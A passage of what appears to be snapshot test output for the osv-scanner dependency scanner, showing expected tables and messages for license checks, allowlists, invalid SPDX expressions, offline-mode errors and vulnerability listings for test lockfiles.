https://osv.dev/GHSA-cj7v-27pg-wf7q | 2.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.47 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-hmr7-m48g-48f6 | 5.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-qh8g-58pp-2wxh | 6.3 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.12 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-wjpw-4j6x-6rwh | 3.7 | Maven | org.eclipse.jetty:jetty-http | 9.4.40.v20210413 | 12.0.31 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-3gh6-v5v9-6v9j | 3.5 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.52 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-gwcr-j4wh-j3cq | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.41 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-j26w-f9rq-mr2q | 5.3 | Maven | org.eclipse.jetty:jetty-servlets | 9.4.40.v20210413 | 9.4.54 | testdata/artifact/javareach_test.jar | | https://osv.dev/GHSA-264p-99wq-f4j6 | 7.5 | Maven | software.amazon.ion:ion-java | 1.0.2 | -- | testdata/artifact/javareach_test.jar | +-------------------------------------+------+-----------+---------------------------------------------+------------------+---------------+--------------------------------------+ --- [TestCommand_JavareachArchive/jars_can_be_scanned_without_call_analysis - 2] --- [TestCommand_Licenses/Licenses_in_summary_mode_json - 1] { "results": [], "experimental_config": { "licenses": { "summary": true, "allowlist": [] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/Licenses_in_summary_mode_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_Licenses/Licenses_with_expressions - 1] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. overriding license for package npm/babel/6.23.0 with MIT AND (LGPL-2.1-or-later OR BSD-3-Clause) overriding license for package npm/human-signals/5.0.0 with LGPL-2.1-only OR MIT OR BSD-3-Clause overriding license for package npm/ms/2.1.3 with MIT WITH Bison-exception-2.2 Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------------------------------------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +---------------------------------------------+-------------------------+ | CC0-1.0 OR MIT | 1 | | LGPL-2.1-only OR MIT OR BSD-3-Clause | 1 | | MIT AND (LGPL-2.1-or-later OR BSD-3-Clause) | 1 | | MIT WITH Bison-exception-2.2 | 1 | +---------------------------------------------+-------------------------+ +------------------------------+-----------+---------+---------+-------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +------------------------------+-----------+---------+---------+-------------------------------------------+ | MIT WITH Bison-exception-2.2 | npm | ms | 2.1.3 | testdata/locks-licenses/package-lock.json | +------------------------------+-----------+---------+---------+-------------------------------------------+ --- [TestCommand_Licenses/Licenses_with_expressions - 2] --- [TestCommand_Licenses/Licenses_with_invalid_expression_in_config - 1] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. overriding license for package npm/babel/6.23.0 with MIT AND (LGPL-2.1-or-later OR BSD-3-Clause)) overriding license for package npm/human-signals/5.0.0 with LGPL-2.1-only OR OR BSD-3-Clause overriding license for package npm/ms/2.1.3 with MIT WITH (Bison-exception-2.2 AND somethingelse) Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +--------------------------------------------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +--------------------------------------------------+-------------------------+ | CC0-1.0 OR MIT | 1 | | LGPL-2.1-only OR OR BSD-3-Clause | 1 | | MIT AND (LGPL-2.1-or-later OR BSD-3-Clause)) | 1 | | MIT WITH (Bison-exception-2.2 AND somethingelse) | 1 | +--------------------------------------------------+-------------------------+ +--------------------------------------------------+-----------+---------------+---------+-------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +--------------------------------------------------+-----------+---------------+---------+-------------------------------------------+ | LGPL-2.1-only OR OR BSD-3-Clause | npm | human-signals | 5.0.0 | testdata/locks-licenses/package-lock.json | | MIT WITH (Bison-exception-2.2 AND somethingelse) | npm | ms | 2.1.3 | testdata/locks-licenses/package-lock.json | +--------------------------------------------------+-----------+---------------+---------+-------------------------------------------+ --- [TestCommand_Licenses/Licenses_with_invalid_expression_in_config - 2] license LGPL-2.1-only OR OR BSD-3-Clause for package npm/human-signals/5.0.0 is invalid: unexpected OR after OR license MIT WITH (Bison-exception-2.2 AND somethingelse) for package npm/ms/2.1.3 is invalid: unexpected ( after WITH --- [TestCommand_Licenses/Licenses_with_invalid_licenses_in_flag - 1] --- [TestCommand_Licenses/Licenses_with_invalid_licenses_in_flag - 2] --licenses requires comma-separated spdx licenses. The following license(s) are not recognized as spdx: something-something --- [TestCommand_Licenses/No_license_violations_and_show-all-packages_in_json - 1] { "results": [ { "source": { "path": "/testdata/locks-licenses/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "babel", "version": "6.23.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "human-signals", "version": "5.0.0", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ] }, { "package": { "name": "ms", "version": "2.1.3", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "type-fest", "version": "4.26.1", "ecosystem": "npm" }, "licenses": [ "CC0-1.0 OR MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [ "MIT", "Apache-2.0" ] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/No_license_violations_and_show-all-packages_in_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_Licenses/No_vulnerabilities_but_license_violations_with_allowlist - 1] Scanning dir ./testdata/locks-many/yarn.lock Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 0 vulnerabilities can be fixed. +---------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +---------+-------------------------+ | MIT | 1 | +---------+-------------------------+ +-------------------+-----------+----------------+---------+-------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+----------------+---------+-------------------------------+ | MIT | npm | balanced-match | 1.0.2 | testdata/locks-many/yarn.lock | +-------------------+-----------+----------------+---------+-------------------------------+ --- [TestCommand_Licenses/No_vulnerabilities_but_license_violations_with_allowlist - 2] --- [TestCommand_Licenses/No_vulnerabilities_with_license_summary - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. +------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +------------+-------------------------+ | MIT | 2 | | Apache-2.0 | 1 | | UNKNOWN | 1 | +------------+-------------------------+ --- [TestCommand_Licenses/No_vulnerabilities_with_license_summary - 2] --- [TestCommand_Licenses/No_vulnerabilities_with_license_summary_in_markdown - 1] Scanning dir ./testdata/locks-many Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Loaded filter from: /testdata/locks-many/osv-scanner-test.toml Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. | License | No. of package versions | | --- | ---:| | MIT | 2 | | Apache-2.0 | 1 | | UNKNOWN | 1 | --- [TestCommand_Licenses/No_vulnerabilities_with_license_summary_in_markdown - 2] --- [TestCommand_Licenses/Show_all_Packages_with_license_summary_in_json - 1] { "results": [ { "source": { "path": "/testdata/locks-licenses/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "babel", "version": "6.23.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "human-signals", "version": "5.0.0", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ] }, { "package": { "name": "ms", "version": "2.1.3", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "type-fest", "version": "4.26.1", "ecosystem": "npm" }, "licenses": [ "CC0-1.0 OR MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/Show_all_Packages_with_license_summary_in_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_Licenses/Some_packages_with_ignored_licenses - 1] Scanning dir ./testdata/locks-many Scanning dir ./testdata/locks-insecure Scanned /testdata/locks-insecure/bun.lock file and found 2 packages Scanned /testdata/locks-insecure/composer.lock file and found 1 package Scanned /testdata/locks-insecure/osv-scanner-custom.json file and found 2 packages Scanned /testdata/locks-many/Gemfile.lock file and found 1 package Scanned /testdata/locks-many/composer.lock file and found 1 package Scanned /testdata/locks-many/package-lock.json file and found 1 package Scanned /testdata/locks-many/yarn.lock file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Package npm/has-flag/4.0.0 has been filtered out because: (no reason given) Package npm/wrappy/1.0.2 has been filtered out because: (no reason given) Package npm/ansi-html/0.0.8 has been filtered out because: (no reason given) Package npm/balanced-match/1.0.2 has been filtered out because: (no reason given) Filtered 4 ignored package/s from the scan. overriding license for package Packagist/league/flysystem/1.0.8 with 0BSD overriding license for package Packagist/sentry/sdk/2.0.4 with 0BSD Total 1 package affected by 1 known vulnerability (1 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 2 ecosystems. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+------------------+---------+---------------+---------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+------------------+---------+---------------+---------------------------------------+ | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-insecure/composer.lock | +-------------------------------------+------+-----------+------------------+---------+---------------+---------------------------------------+ +---------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +---------+-------------------------+ | 0BSD | 2 | | MIT | 1 | | UNKNOWN | 2 | +---------+-------------------------+ +-------------------+-----------+------------------+---------+-------------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+------------------+---------+-------------------------------------------------+ | 0BSD | Packagist | league/flysystem | 1.0.8 | testdata/locks-insecure/composer.lock | | UNKNOWN | Go | stdlib | 1.99.9 | testdata/locks-insecure/osv-scanner-custom.json | | UNKNOWN | Go | toolchain | 1.99.9 | testdata/locks-insecure/osv-scanner-custom.json | | 0BSD | Packagist | sentry/sdk | 2.0.4 | testdata/locks-many/composer.lock | +-------------------+-----------+------------------+---------+-------------------------------------------------+ --- [TestCommand_Licenses/Some_packages_with_ignored_licenses - 2] --- [TestCommand_Licenses/Some_packages_with_license_violations_and_show-all-packages_in_json - 1] { "results": [ { "source": { "path": "/testdata/locks-licenses/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "babel", "version": "6.23.0", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "human-signals", "version": "5.0.0", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] }, { "package": { "name": "ms", "version": "2.1.3", "ecosystem": "npm" }, "licenses": [ "MIT" ] }, { "package": { "name": "type-fest", "version": "4.26.1", "ecosystem": "npm" }, "licenses": [ "CC0-1.0 OR MIT" ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [ "MIT" ] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/Some_packages_with_license_violations_and_show-all-packages_in_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_Licenses/Some_packages_with_license_violations_in_json - 1] { "results": [ { "source": { "path": "/testdata/locks-licenses/package-lock.json", "type": "lockfile" }, "packages": [ { "package": { "name": "human-signals", "version": "5.0.0", "ecosystem": "npm" }, "licenses": [ "Apache-2.0" ], "license_violations": [ "Apache-2.0" ] } ] } ], "experimental_config": { "licenses": { "summary": true, "allowlist": [ "MIT" ] } }, "license_summary": [ { "name": "MIT", "count": 2 }, { "name": "Apache-2.0", "count": 1 }, { "name": "CC0-1.0 OR MIT", "count": 1 } ] } --- [TestCommand_Licenses/Some_packages_with_license_violations_in_json - 2] Scanning dir ./testdata/locks-licenses/package-lock.json Scanned /testdata/locks-licenses/package-lock.json file and found 4 packages Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. --- [TestCommand_Licenses/Vulnerabilities_and_all_license_violations_allowlisted - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ +------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +------------+-------------------------+ | Apache-2.0 | 1 | +------------+-------------------------+ --- [TestCommand_Licenses/Vulnerabilities_and_all_license_violations_allowlisted - 2] --- [TestCommand_Licenses/Vulnerabilities_and_license_summary - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ +------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +------------+-------------------------+ | Apache-2.0 | 1 | +------------+-------------------------+ --- [TestCommand_Licenses/Vulnerabilities_and_license_summary - 2] --- [TestCommand_Licenses/Vulnerabilities_and_license_violations_with_allowlist - 1] Scanning dir ./testdata/locks-many-with-insecure/package-lock.json Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Warning: plugin transitivedependency/pomxml can be risky when run on untrusted artifacts. Please ensure you trust the source code and artifacts before proceeding. Total 1 package affected by 1 known vulnerability (0 Critical, 1 High, 0 Medium, 0 Low, 0 Unknown) from 1 ecosystem. 1 vulnerability can be fixed. +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | +-------------------------------------+------+-----------+-----------+---------+---------------+-----------------------------------------------------+ +------------+-------------------------+ | LICENSE | NO. OF PACKAGE VERSIONS | +------------+-------------------------+ | Apache-2.0 | 1 | +------------+-------------------------+ +-------------------+-----------+-----------+---------+-----------------------------------------------------+ | LICENSE VIOLATION | ECOSYSTEM | PACKAGE | VERSION | SOURCE | +-------------------+-----------+-----------+---------+-----------------------------------------------------+ | Apache-2.0 | npm | ansi-html | 0.0.1 | testdata/locks-many-with-insecure/package-lock.json | +-------------------+-----------+-----------+---------+-----------------------------------------------------+ --- [TestCommand_Licenses/Vulnerabilities_and_license_violations_with_allowlist - 2] --- [TestCommand_Licenses/When_offline_licenses_are_still_validated - 1] --- [TestCommand_Licenses/When_offline_licenses_are_still_validated - 2] --licenses requires comma-separated spdx licenses. The following license(s) are not recognized as spdx: something-something --- [TestCommand_Licenses/When_offline_licenses_cannot_be_checked - 1] --- [TestCommand_Licenses/When_offline_licenses_cannot_be_checked - 2] cannot retrieve licenses locally --- [TestCommand_Licenses/When_offline_licenses_summary_cannot_be_printed - 1] --- [TestCommand_Licenses/When_offline_licenses_summary_cannot_be_printed - 2] cannot retrieve licenses locally --- [TestCommand_LocalDatabases/.gitignored_files - 1] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/.gitignored_files - 2] --- [TestCommand_LocalDatabases/.gitignored_files - 3] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/.gitignored_files - 4] --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked - 1] Scanning dir ./testdata/locks-many-with-insecure Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Filtered 1 local/unscannable package/s from the scan. Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded Alpine local db from /osv-scanner/Alpine/all.zip Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip Total 6 packages affected by 10 known vulnerabilities (1 Critical, 3 High, 2 Medium, 3 Low, 1 Unknown) from 3 ecosystems. 6 vulnerabilities can be fixed. +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ | https://osv.dev/DRUPAL-CORE-2025-005 | 2.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-83v7-c2cf-p9c2 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-006 | 5.9 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-m6vv-vcj8-w8m7 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-007 | 2.1 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-h89p-5896-f4q8 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-008 | 3.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-mhpg-hpj5-73r2 | | | | | | | | https://osv.dev/DRUPAL-CONTRIB-2025-083 | | Packagist | drupal/simple_sitemap | 4.2.1 | -- | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked - 2] --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked - 3] Scanning dir ./testdata/locks-many-with-insecure Scanned /testdata/locks-many-with-insecure/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-insecure/alpine.cdx.xml file and found 15 packages Scanned /testdata/locks-many-with-insecure/composer.lock file and found 6 packages Scanned /testdata/locks-many-with-insecure/package-lock.json file and found 1 package Scanned /testdata/locks-many-with-insecure/yarn.lock file and found 1 package Filtered 1 local/unscannable package/s from the scan. Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded Alpine local db from /osv-scanner/Alpine/all.zip Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip Total 6 packages affected by 10 known vulnerabilities (1 Critical, 3 High, 2 Medium, 3 Low, 1 Unknown) from 3 ecosystems. 6 vulnerabilities can be fixed. +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ | OSV URL | CVSS | ECOSYSTEM | PACKAGE | VERSION | FIXED VERSION | SOURCE | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ | https://osv.dev/DRUPAL-CORE-2025-005 | 2.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-83v7-c2cf-p9c2 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-006 | 5.9 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-m6vv-vcj8-w8m7 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-007 | 2.1 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-h89p-5896-f4q8 | | | | | | | | https://osv.dev/DRUPAL-CORE-2025-008 | 3.7 | Packagist | drupal/core | 10.4.5 | 10.4.9 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-mhpg-hpj5-73r2 | | | | | | | | https://osv.dev/DRUPAL-CONTRIB-2025-083 | | Packagist | drupal/simple_sitemap | 4.2.1 | -- | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-9f46-5r25-5wfm | 9.8 | Packagist | league/flysystem | 1.0.8 | 1.1.4 | testdata/locks-many-with-insecure/composer.lock | | https://osv.dev/GHSA-whgm-jr23-g3j9 | 7.5 | npm | ansi-html | 0.0.1 | 0.0.8 | testdata/locks-many-with-insecure/package-lock.json | | https://osv.dev/ALPINE-CVE-2025-26519 | 7.0 | Alpine | musl | 1.2.3-r4 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-22184 | 7.8 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | | https://osv.dev/ALPINE-CVE-2026-27171 | 5.5 | Alpine | zlib | 1.2.13-r0 | -- | testdata/locks-many-with-insecure/alpine.cdx.xml | +-----------------------------------------+------+-----------+-----------------------+-----------+---------------+-----------------------------------------------------+ --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked - 4] --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked#01 - 1] Scanning dir ./testdata/locks-many-with-invalid Scanned /testdata/locks-many-with-invalid/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-invalid/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded npm local db from /osv-scanner/npm/all.zip Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked#01 - 2] Error during extraction: (extracting as php/composerlock) /testdata/locks-many-with-invalid/composer.lock: could not extract: invalid character ',' looking for beginning of object key string --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked#01 - 3] Scanning dir ./testdata/locks-many-with-invalid Scanned /testdata/locks-many-with-invalid/Gemfile.lock file and found 1 package Scanned /testdata/locks-many-with-invalid/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded npm local db from /osv-scanner/npm/all.zip Total 0 packages affected by 0 known vulnerabilities (0 Critical, 0 High, 0 Medium, 0 Low, 0 Unknown) from 0 ecosystems. 0 vulnerabilities can be fixed. --- [TestCommand_LocalDatabases/all_supported_lockfiles_in_the_directory_should_be_checked#01 - 4] Error during extraction: (extracting as php/composerlock) /testdata/locks-many-with-invalid/composer.lock: could not extract: invalid character ',' looking for beginning of object key string --- [TestCommand_LocalDatabases/database_should_be_downloaded_only_when_offline_is_set - 1] --- [TestCommand_LocalDatabases/database_should_be_downloaded_only_when_offline_is_set - 2] databases can only be downloaded when running in offline mode --- [TestCommand_LocalDatabases/database_should_be_downloaded_only_when_offline_is_set - 3] --- [TestCommand_LocalDatabases/database_should_be_downloaded_only_when_offline_is_set - 4] databases can only be downloaded when running in offline mode --- [TestCommand_LocalDatabases/ignoring_.gitignore - 1] Scanning dir ./testdata/locks-gitignore Scanned /testdata/locks-gitignore/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/ignored/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/Gemfile.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/composer.lock file and found 1 package Scanned /testdata/locks-gitignore/subdir/yarn.lock file and found 1 package Scanned /testdata/locks-gitignore/yarn.lock file and found 1 package Loaded RubyGems local db from /osv-scanner/RubyGems/all.zip Loaded Packagist local db from /osv-scanner/Packagist/all.zip Loaded npm local db from /osv-scanner/npm/all.zip No issues found --- [TestCommand_LocalDatabases/ignoring_.gitignore - 2] --- [TestCommand_LocalDatabases/ignoring_.gitignore - 3] Scanning dir 